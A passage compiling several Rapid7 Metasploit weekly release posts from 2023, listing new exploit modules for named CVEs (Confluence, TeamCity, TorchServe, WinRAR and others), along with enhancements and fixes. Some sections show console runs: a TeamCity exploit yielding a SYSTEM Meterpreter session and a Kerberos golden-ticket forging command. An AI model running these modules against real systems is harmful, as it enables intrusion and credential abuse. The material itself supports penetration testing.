Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell [email protected]
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

• #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
• #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
• #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
• #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

• #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
• #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system still.

Documentation added (1)

• #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and killing stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.39…6.3.40
• Full diff 6.3.39…6.3.40

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/10/19/metasploit-weekly-wrap-up-32/

That Privilege Escalation Escalated Quickly

This release features a module leveraging CVE-2023-22515, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a privilege escalation, but quickly recategorized as a “broken access control” with a CVSS score of 10. The exploit itself is very simple and easy to use so there was little surprise when CISA published an advisory stating that threat actors were using it in the wild. It is imperative that anyone using the affected versions mitigate risk and patch as quickly as possible.

Improved sessions searching

This release enhances the sessions command with additional search filters, for instance:

sessions -S 'sesion_id:1 session_id:5'
sessions -S 'session_type:meterpreter'
sessions -S 'last_checkin:greater_than:1h10m last_checkin:less_than:2h'

These search options can be used in conjunction with other session options. For instance the --verbose flag:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -v

Active sessions
===============

  Session ID: 8
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50564 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 4d78f75abbdbf0c8/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 18003s ago @ 2023-10-19 15:45:30 +0100
  Registered: No

  Session ID: 9
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50565 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 48d32692e0633293/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 10803s ago @ 2023-10-19 17:45:30 +0100
  Registered: No

Or as an easy way to search for and kill matching stale sessions with --kill-all:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -K
[*] Killing matching sessions...

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50540 (192.168.123.132)
  5         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50555 (192.168.123.132)

[*] 192.168.123.132 - Meterpreter session 4 closed.
[*] 192.168.123.132 - Meterpreter session 5 closed.

New module content (2)

Apache Superset Signed Cookie RCE

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Exploit
Pull request: #18351 contributed by h00die
Path: linux/http/apache_superset_cookie_sig_rce

Description: This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.

Atlassian Confluence Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18461 contributed by sfewer-r7
Path: multi/http/atlassian_confluence_rce_cve_2023_22515

Description: This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware and uploading a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created. This would require a manual clean up.

Enhancements and features (7)

• #17689 from manishkumarr1017 – Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar.
• #18364 from zgoldman-r7 – Add support for filtering sessions based on last checkin time, session type and id.
• #18381 from sjanusz-r7 – Adds new options -r and --reload-libs to the check, recheck, to_handler, reload, run and rerun commands. This new option will reload all library files before performing the original command.
• #18428 from AleksaZatezalo – This PR adds documentation for the mssql_login module.
• #18438 from adfoster-r7 – Makes improvements to the UX for database management prompts. Now when running msfdb init the user is no longer prompted for database deletion. The message for clearing unused data service credentials has been reworded.
• #18450 from adfoster-r7 – Adds support for Ruby 3.3.0-preview2.
• #18451 from adfoster-r7 – Updates the newly added cracked password column as part of the creds to work with the remote database.

Bugs fixed (3)

• #18442 from adfoster-r7 – Improves stability of msfdb initialization on windows environments. Previously the msfdb init script would hang indefinitely on Windows environments, as well as there being false negatives on detecting if the database was running or not.
• #18443 from adfoster-r7 – Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
• #18449 from adfoster-r7 – Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.

Documentation added (1)

• #18452 from jheysel-r7 – Updates the Metasploit Wiki to include information on how to run quality tools on module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.38…6.3.39
• Full diff 6.3.38…6.3.39

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/10/13/metasploit-weekly-wrap-up-31/

Pollution in Kibana

This week, contributor h00die added a module that leverages a prototype pollution bug in Kibana prior to version 7.6.3. Particularly, this issue is within the Upgrade Assistant and enables an attacker to execute arbitrary code. This vulnerability can be triggered by sending a queries that sets a new constructor.prototype.sourceURL directly to Elastic or by using Kibana to submit the same queries. Note that Kibana needs to be restarted or wait for collection to happen for the payload to execute. This vulnerability doesn’t seem to be assigned a CVE. The module has been written based on a detailed description from Alex Brasetvik (alexbrasetvik) in a Hackerone report.

Torch chain attack

Our very own zeroSteiner added a module that exploits PyTorch model server by chaining multiple vulnerabilities. First, it takes advantage of a weak default configuration that binds the management interface to all IP addresses. Then, once it reaches the management interface, the module exploits a Server-Side Request Forgery vulnerability (CVE-2023-43654) to register MAR (Model Archive) model files from arbitrary servers. Finally, it leverages a vulnerability in SnakeYaml (CVE-2022-1471) that allows code execution when a YAML file is deserialized by SnakeYaml. The module embeds a malicious YAML file in a MAR file and gets an arbitrary Java class executed when this MAR file is loaded.

Updated MySQL version support

Thanks to the work of Rory McKinley, multiple MySQL modules now support authentication against newer MySQL 8.0 versions. This required a lot of effort unearthing and patching historical code across multiple contributions to the Metasploit codebase, and to the Ruby MySQL library dependency. MySQL module highlights include:

• auxiliary/scanner/mysql/mysql_login – Bruteforce and manual verification of MySQL credentials
• auxiliary/scanner/mysql/mysql_version – MySQL Server Version Enumeration
• auxiliary/scanner/mysql/mysql_hashdump – MySQL password hashdump support
• auxiliary/scanner/mysql/mysql_schemadump – Extracting MySQL schema details
• auxiliary/admin/mysql/mysql_sql – Run arbitrary MySQL SQL queries against a given target

New module content (2)

Kibana Upgrade Assistant Telemetry Collector Prototype Pollution

Authors: Alex Brasetvik (alexbrasetvik) and h00die
Type: Exploit
Pull request: #18417 contributed by h00die
Path: linux/http/kibana_upgrade_assistant_telemetry_rce

Description: Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we’re able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.

PyTorch Model Server Registration and Deserialization RCE

Authors: Gal Elbaz, Guy Kaplan, Idan Levcovich, Spencer McIntyre, and Swapneil Kumar Dash
Type: Exploit
Pull request: #18427 contributed by zeroSteiner
Path: multi/http/torchserver_cve_2023_43654

Description: This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.

Enhancements and features (6)

• #18171 from dwelch-r7 – This fixes an issue when users use a payload when framework is started with the --defer-module-loads flag set. This also adds a new feature flag option defer_module_loads which, when enabled, will defer module loads by default without the need to specify--defer-module-loads every time the framework boots. Finally, this comes with a sizable improvement on frameworks boot up time.
• #18256 from jmartin-tech – Performs a routine update of multiple library dependencies.
• #18296 from rorymckinley – Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
• #18383 from cgranleese-r7 – This adds a variety of improvements to the enum_computers module including Shell and Powershell support as well as improvements when running on non-english systems.

Bugs fixed (2)

• #18411 from rtpt-erikgeiser – Fixes an issue where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
• #18431 from zeroSteiner – This switches the way in which port forwarded IPs are displayed so that the local IP is listed under local and the remote IP is listed under remote.

Documentation added (1)

• #18394 from errorxyz – This adds documentation for the auxiliary/scanner/http/http_traversal module.
• #18435 from h00die – Fixes multiple spelling mistakes in the Wiki.
• #18444 from h00die – Fixes spelling mistakes in module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.37…6.3.38
• Full diff 6.3.37…6.3.38

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2023/10/06/metasploit-weekly-wrap-up-30/

New module content (3)

LDAP Login Scanner

Author: Dean Welch
Type: Auxiliary
Pull request: #18197 contributed by dwelch-r7
Path: scanner/ldap/ldap_login

Description: This PR adds a new login scanner module for LDAP. Login scanners are the classes that provide functionality for testing authentication against various different protocols and mechanisms. This LDAP login scanner supports multiple types of authentication including: Plaintext, NTLM, Kerberos and SChannel.

Junos OS PHPRC Environment Variable Manipulation RCE

Authors: Jacob Baines, Ron Bowes, and jheysel-r7
Type: Exploit
Pull request: #18389 contributed by jheysel-r7
Path: freebsd/http/junos_phprc_auto_prepend_file

Description: This adds an exploit module that leverages a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. This vulnerability is identified as CVE-2023-36845 and allows an attacker to achieve unauthenticated remote code execution as a low privileged user. This module also includes a jailbreak feature that consists in changing the root password and establishing an SSH session as the root user. The original password is restored when the module terminates.

Progress Software WS_FTP Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18414 contributed by sfewer-r7
Path: windows/http/ws_ftp_rce_cve_2023_40044

Description: This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

AttackerKB Assessment: (https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis)

Enhancements and features (6)

• #17919 from bcoles – This PR adds support for starting and stopping Windows services using the service control manager to shell payloads.
• #18338 from smashery – This PR updates the kerberos.rb library such that when a kerberos login is attempted, on a user where pre-authentication is not required, the module now requests a RRC4-HMAC ticket, since it’s more easily crackable.
• #18363 from j0ev – This PR adds support to outputting payloads in octal in both framework and venom.
• #18412 from zeroSteiner – This adds additional usage tips to Metasploit, expanding the pool that is selected from on startup.
• #18420 from smashery – :
  This PR updates the user-agent string reported by our http payloads. We update this periodically to make sure that our payloads don’t stick out having an older user agent string.
• #18425 from adfoster-r7 – Adds history support to the nasm and metasm shells. Now when re-opening these shells, previously typed commands should be remembered and available.

Bugs fixed (1)

• #18372 from gcarmix – Fixed an issue in the generic shell download command.

Documentation added (3)

• #18277 from cnnrshd –
  This PR adds new documentation for how to create a command injection exploit module.
• #18347 from bwatters-r7 – This PR updates the how-to-write-a-check-method docs to better explain to not use fail_with to align with best practices when making sure a check method returns a check code.
• #18393 from adfoster-r7 – Updates the running modules landing page on the Wiki with more beginner friendly information on searching for and running modules.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.36…6.3.37
• Full diff 6.3.36…6.3.37

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain’s TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10×64 22H2.

Enhancements and features (1)

• #18399 from h00die – Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.35…6.3.36
• Full diff 6.3.35…6.3.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/22/metasploit-weekly-wrap-up-28/

Improved Ticket Forging

Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. In Windows Server 2022, Microsoft started requiring additional new PAC elements to be present – the PAC requestor and PAC attributes. The newly forged tickets will have the necessary elements added automatically based on the user provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: [email protected]
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 – Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow’s example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow’s Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc https://github.com/Kazamayc and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI egebalci <Ege BALCI [email protected]>
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

Enhancements and features (5)

• #18294 from zgoldman-r7 – Improves error messages when failing to interact with a network interface such as calling set LHOST=.
• #18358 from zeroSteiner – This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
• #18361 from cgranleese-r7 – Updates the search command with additional the search keywords stage: :stager: and adapter:.
• #18374 from h00die – Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
• #18377 from ErikWynter – This change adds a check to the smtp_relay auxiliary/scanner/smtp/smtp_relay scanner module to confirm if the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

• #18359 from smashery – Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
• #18369 from adfoster-r7 – This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
• #18370 from adfoster-r7 – This PR fixes an issue where msfrpc would hang when updating saved command history.
• #18378 from adfoster-r7 – Removes fremaining debug logging from Prometheus Exporter.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.34…6.3.35
• Full diff 6.3.34…6.3.35

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/15/metasploit-weekly-wrap-up-27/

Flask Cookies

This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset where session cookies can be resigned, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module auxiliary/gather/python_flask_cookie_signer allows for bruteforcing common signing keys from a wordlist as well as decoding cookies and resigning cookies if the key is known (or recovered).

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates 2 modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly Mobileiron Sentry). Ivanti Sentry is vulnerable to an authentication by-pass which exposes API functionality,allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
CVE reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
CVE reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY/SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

• #17474 from prabhatjoshi321 – This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
• #18262 from cgranleese-r7 – Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
• #18270 from pbarry25 – Improves tab completion for the set and unset commands.
• #18327 from h00die – Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
• #18349 from adfoster-r7 – Adds Meterpreter compatibility matrix generation to Github’s acceptance test runs. Now, it’s possible to visually see which Meterpreters support particular functionality.
• #18354 from zeroSteiner – This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
• #18356 from adfoster-r7 – This PR updates the Docker Golang version.
• #18357 from adfoster-r7 – Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

• #17970 from YiDa858 – Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
• #18362 from adfoster-r7 – Fixes an edgecase which could cause a new msfrpc console instance to hang forever.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.33…6.3.34
• Full diff 6.3.33…6.3.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
